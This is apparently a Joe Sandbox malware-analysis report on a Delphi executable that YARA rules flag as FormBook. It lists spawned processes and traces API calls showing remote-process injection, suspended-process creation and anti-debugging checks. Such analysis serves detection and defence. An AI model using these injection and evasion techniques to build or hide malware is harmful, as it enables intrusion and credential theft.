                                                                                                                                        Data Ascii: doWS2bXCQ4+hbMkEXpRgeYvWR7jb7Ek7JXzpGyltjDV9+5tMQVYfc6oEy6rvvG6JSRftOfXX21cYxy95QluHSvyXOpSkhloYiUcKbHb5G+RQctwZI9McZxzhNEIADpLUERoh1j/S/GfVLwMq++ZHtQJ68ezwGUtxHCoNM4gjBgCOa5cR6r3suIClK2peouBPPpiDc4fVzt85YupzXdjejmFXgkcqf0EFKbx0rHDHW5Uug5AL1ZKzPgXjg/GL8qR



                                                                                                                                        Target ID:0
                                                                                                                                        Start time:01:02:06
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Users\user\Desktop\z10982283782.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\user\Desktop\z10982283782.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:1'114'112 bytes
                                                                                                                                        MD5 hash:3138EDFDC34F754C5F31088F00AE239D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:10
                                                                                                                                        Start time:01:02:17
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                                                        Imagebase:0x450000
                                                                                                                                        File size:86'528 bytes
                                                                                                                                        MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:12
                                                                                                                                        Start time:01:02:27
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe"
                                                                                                                                        Imagebase:0x4b0000
                                                                                                                                        File size:140'800 bytes
                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:13
                                                                                                                                        Start time:01:02:29
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\takeown.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Windows\SysWOW64\takeown.exe"
                                                                                                                                        Imagebase:0x1000000
                                                                                                                                        File size:51'712 bytes
                                                                                                                                        MD5 hash:A9AB2877AE82A53F5A387B045BF326A4
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:14
                                                                                                                                        Start time:02:04:54
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe"
                                                                                                                                        Imagebase:0x4b0000
                                                                                                                                        File size:140'800 bytes
                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:17
                                                                                                                                        Start time:02:05:07
                                                                                                                                        Start date:23/10/2024
                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                        Imagebase:0x7ff722870000
                                                                                                                                        File size:676'768 bytes
                                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true


                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:11.2%
                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                          Signature Coverage:10.7%
                                                                                                                                          Total number of Nodes:289
                                                                                                                                          Total number of Limit Nodes:15
execution_graph: node and edge listing of the interactive execution graph (rendered graphically in the original report; the raw node/edge dump is omitted here).
11 API calls 35694->35695 35696 2aa835b 35695->35696 35697 2a94860 11 API calls 35696->35697 35698 2aa837a 35697->35698 35699 2aa81cc 17 API calls 35698->35699 35700 2aa838d 35699->35700 35701 2aa8274 15 API calls 35700->35701 35702 2aa8393 FlushInstructionCache 35701->35702 35703 2aa83b9 35702->35703 35704 2a944dc 11 API calls 35703->35704 35705 2aa83c1 FreeLibrary 35704->35705 35705->35640

Control-flow Graph (function starting at 2ab8128; rendered graphically in the interactive report, with nodes marked Executed or Not Executed)
Direct API calls on the graph, in path order: CreateProcessAsUserW, ResumeThread, CloseHandle, CloseHandle, ExitProcess. Between these, every path repeats the helper sequence call 2a94860, 2a949a0, 2a946d4, 2a947ec, 2aa89d0; 2aa894c is called six times in a row before the second CloseHandle, and 2a97e5c (GetFileAttributesA), 2aadc8c (RtlDosPathNameToNtPathName_U, NtCreateFile, NtWriteFile, NtClose) and 2aa8338 (FlushInstructionCache) are called on the blocks leading to ExitProcess.
APIs
  • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C0B7E0,02C0B824,OpenSession,02B17380,02ABB7B8,UacScan,02B17380), ref: 02AB86E9
• ResumeThread.KERNEL32(00000000,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8), ref: 02AB8D33
• CloseHandle.KERNEL32(00000000,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,00000000,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380), ref: 02AB8EB2
  • Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,UacScan), ref: 02AA8960
  • Part of subcall function 02AA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02AA897A
  • Part of subcall function 02AA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
• CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B17380,02ABB7B8,UacInitialize,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,UacScan,02B17380), ref: 02AB92A4
  • Part of subcall function 02A97E5C: GetFileAttributesA.KERNEL32(00000000,?,02AB041F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,UacInitialize), ref: 02A97E67
  • Part of subcall function 02AADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02AADD5E), ref: 02AADCCB
  • Part of subcall function 02AADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02AADD05
  • Part of subcall function 02AADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02AADD32
  • Part of subcall function 02AADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02AADD3B
  • Part of subcall function 02AA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AA83C2), ref: 02AA83A4
• ExitProcess.KERNEL32(00000000,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,Initialize,02B17380,02ABB7B8,00000000,00000000,00000000,ScanString,02B17380,02ABB7B8), ref: 02ABB2FA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
• String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
• API String ID: 2769005614-3738268246
• Opcode ID: 80e4c3ef86f80f9d060256b0fb1d67483fb8f2b4b6915a30b19d7d1519cbc6db
• Instruction ID: 48b674fab93d6b2c5f6a071bac215f76a331cfe086383a9f2c9a804fd713271a
• Opcode Fuzzy Hash: 80e4c3ef86f80f9d060256b0fb1d67483fb8f2b4b6915a30b19d7d1519cbc6db
• Instruction Fuzzy Hash: 6D43F775A8411CDFDF21EB65DE909CA73FABF88304F5044E2A509AB614DE30AE92CF51

Control-flow Graph (function starting at 2aab118; rendered graphically in the interactive report, with nodes marked Executed or Not Executed)
Direct API calls on the graph, in path order: GetModuleHandleW, NtOpenProcess, IsBadReadPtr, IsBadReadPtr, GetModuleHandleW, NtCreateThreadEx. The same helper sequence (call 2a94860, 2a949a0, 2a946d4, 2a947ec, 2aa89d0) separates every call; 2aa7a2c (NtAllocateVirtualMemory) is called on the blocks after NtOpenProcess, 2aa7d78 (NtWriteVirtualMemory) on the block that precedes the second GetModuleHandleW and NtCreateThreadEx, and 2aa894c repeatedly on the exit blocks.
APIs
  • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
• GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02B17380,02AACFC0,ScanString,02B17380,02AACFC0,ScanBuffer,02B17380,02AACFC0,ScanString,02B17380,02AACFC0,UacScan,02B17380), ref: 02AAB3EA
  • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
• NtOpenProcess.NTDLL(02B17584,001F0FFF,02B17318,02B17330), ref: 02AAB4E8
  • Part of subcall function 02A92EE0: QueryPerformanceCounter.KERNEL32 ref: 02A92EE4
  • Part of subcall function 02AA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
• IsBadReadPtr.KERNEL32(218F0000,00000040), ref: 02AAB95F
• IsBadReadPtr.KERNEL32(?,000000F8), ref: 02AAB98C
  • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
• GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02B17380,02AACFC0,ScanString,02B17380,02AACFC0,065F0000,065F0000,21940000,1BF4C8EC,02B17588,OpenSession,02B17380,02AACFC0), ref: 02AAC807
• NtCreateThreadEx.NTDLL(02B17560,02000000,02B17318,065F1560,065F1560,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02AACA18
  • Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,UacScan), ref: 02AA8960
  • Part of subcall function 02AA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02AA897A
                                                                                                                                            • Part of subcall function 02AA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: AddressHandleLibraryModuleProc$FreeMemoryReadVirtual$AllocateCounterCreateLoadOpenPerformanceProcessQueryThreadWrite
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$ntdll
• API String ID: 341001173-1870492900

Control-flow Graph (rendered graph not reproduced; function starting at 02A95ACC)
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A90000,02ABE790), ref: 02A95AE8
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A90000,02ABE790), ref: 02A95B06
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A90000,02ABE790), ref: 02A95B24
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A95B42
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A95B8B
• RegQueryValueExA.ADVAPI32(?,02A95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A95BD1,?,80000001), ref: 02A95BA9
• RegCloseKey.ADVAPI32(?,02A95BD8,00000000,?,?,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95BCB
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A95BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A95BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A95BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A95C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A95C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A95C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A95CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A95CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A95CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A95CEB
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1759228003-2375825460

Control-flow Graph (rendered graph not reproduced; function starting at 02AA894C)
APIs
• LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,UacScan), ref: 02AA8960
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02AA897A
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
  • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
• String ID: BCryptVerifySignature$bcrypt
• API String ID: 1002360270-4067648912

Control-flow Graph (rendered graph not reproduced; function starting at 02AAF744)
APIs
• GetModuleHandleW.KERNEL32(KernelBase), ref: 02AAF754
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02AAF766
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02AAF77D
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: AddressCheckDebuggerHandleModulePresentProcRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 35162468-539270669

Control-flow Graph (rendered graph not reproduced)

APIs
  • Part of subcall function 02A94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A94F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02AADE40), ref: 02AADDAB
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02AADE40), ref: 02AADDDB
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02AADDF0
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02AADE1C
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02AADE25
  • Part of subcall function 02A94C60: SysFreeString.OLEAUT32(02AAF4A4), ref: 02A94C6E
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
                                                                                                                                          • Opcode ID: 429593673390f01c063a5b330610aeed0d362e49a0e1526ddf762469c920c06c
                                                                                                                                          • Instruction ID: e13400c7fffb806658955a7883a4074d0d60e1a622a6d8858ab672fd6aa79875
                                                                                                                                          • Opcode Fuzzy Hash: 429593673390f01c063a5b330610aeed0d362e49a0e1526ddf762469c920c06c
                                                                                                                                          • Instruction Fuzzy Hash: E421E071A80709BEEB11EA95CD52FDEB7ADAF48B00F500461B301E7580DF74AA058B94

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02AAE5F6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
